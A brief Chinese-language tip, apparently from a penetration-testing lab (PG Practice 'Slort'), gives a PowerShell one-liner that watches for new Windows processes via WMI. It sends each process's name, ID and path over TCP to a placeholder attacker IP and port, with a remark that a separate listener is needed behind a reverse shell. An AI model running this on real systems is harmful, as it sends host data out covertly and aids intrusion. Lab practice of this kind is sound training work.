powershell监控windows新增进程(类似pspy)

Register-WmiEvent -Q "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'" -SourceIdentifier ProcessStart -A{if(-not $tcpClient){$tcpClient=[System.Net.Sockets.TcpClient]::new('<ip>',<port>);$writer=[System.IO.StreamWriter]::new($tcpClient.GetStream())};$process=$Event.SourceEventArgs.NewEvent.TargetInstance;$writer.WriteLine("New process: $($process.Name),ID=$($process.ProcessId),Path=$((gci C:\ -R -I $process.Name|Select-Object -F 1).FullName)");$writer.Flush()};while($true){Start-Sleep -S 1}

在PG practice slort上测试：

貌似无法直接输出结果（可能是因为是revshell的原因），所以是需要另起一个监听端口来接收输出。